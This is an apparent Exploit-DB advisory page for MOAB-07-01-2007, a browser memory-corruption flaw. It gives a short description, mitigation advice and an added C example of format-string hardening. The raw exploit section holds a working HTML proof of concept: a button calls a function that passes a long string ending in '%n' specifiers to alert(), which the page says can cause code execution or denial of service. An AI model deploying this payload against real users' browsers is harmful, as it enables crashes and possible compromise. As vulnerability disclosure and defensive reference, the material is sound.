Vendor: Not available
By: LMH
CVSS: 7.5 (HIGH)
Memory Corruption
CWE: 119
Product Name: Not available
Affected Version From: Not available
Affected Version To: Not available
Patch Exists: NO
Related CWE: Not available
CPE: Not available
Metasploit:
Other Scripts:
Platforms Tested: Web browsers (affected platforms not specified)
2007

MOAB-07-01-2007

The exploit code triggers a memory corruption vulnerability by generating a long string, appending '%n' format specifiers, and passing it to the alert function. This can lead to arbitrary code execution or denial of service.

Mitigation:

The vulnerability can be mitigated by validating and properly sanitizing user input before it is used in functions that can cause memory corruption.
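
The mitigation above, sketched in C as an added example (not part of the original advisory or its test page): untrusted text is passed only as an argument to a constant "%s" format, and a helper flags format directives in input. The function names are hypothetical, and it is an assumption that the alert text reaches a printf-style routine; the page does not name the affected function.

```c
#include <stdio.h>
#include <string.h>

/* Constructed sample with the same shape as the page's test string:
   64 'A' characters followed by six "%n" directives. */
static void build_sample(char *out, size_t cap) {
    size_t n = 64;
    if (cap < n + 13) { if (cap) out[0] = '\0'; return; }
    memset(out, 'A', n);
    strcpy(out + n, "%n%n%n%n%n%n");
}

/* Count printf-style directives in untrusted text.
   "%%" is a literal percent sign and is not counted. */
static int count_directives(const char *s) {
    int count = 0;
    for (; *s; s++) {
        if (*s != '%') continue;
        if (s[1] == '%') s++;   /* escaped literal percent */
        else count++;           /* start of a conversion directive */
    }
    return count;
}

/* Hardened pattern: untrusted text is only ever an argument to a
   constant "%s" format, so its '%' characters are copied verbatim. */
static int render_message(char *dst, size_t cap, const char *untrusted) {
    /* Vulnerable form, for contrast: snprintf(dst, cap, untrusted); */
    return snprintf(dst, cap, "%s", untrusted);
}

int main(void) {
    char msg[128], shown[128];
    build_sample(msg, sizeof msg);
    int n = render_message(shown, sizeof shown, msg);
    printf("directives=%d rendered=%d verbatim=%s\n",
           count_directives(msg), n,
           strcmp(msg, shown) == 0 ? "yes" : "no");
    return 0;
}
```

Compiling callers with `-Wformat -Wformat-security` (GCC and Clang) reports calls where a non-literal string is used as the format argument.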

Exploit-DB raw data:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
	"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html>
	<head>
		<title>MOAB-07-01-2007</title>
		<script>
			/* LMH */
			function boom() {
				var str = 'A';
				while (str.length <= 32) str+=str;
				str = str + '%n%n%n%n%n%n';
				alert(str);
			}
		</script>
	</head>
	<body>
		<input type="button" onclick="boom();" value="Test MOAB-07-01-2007" />
	</body>

</html>

# milw0rm.com [2007-01-07]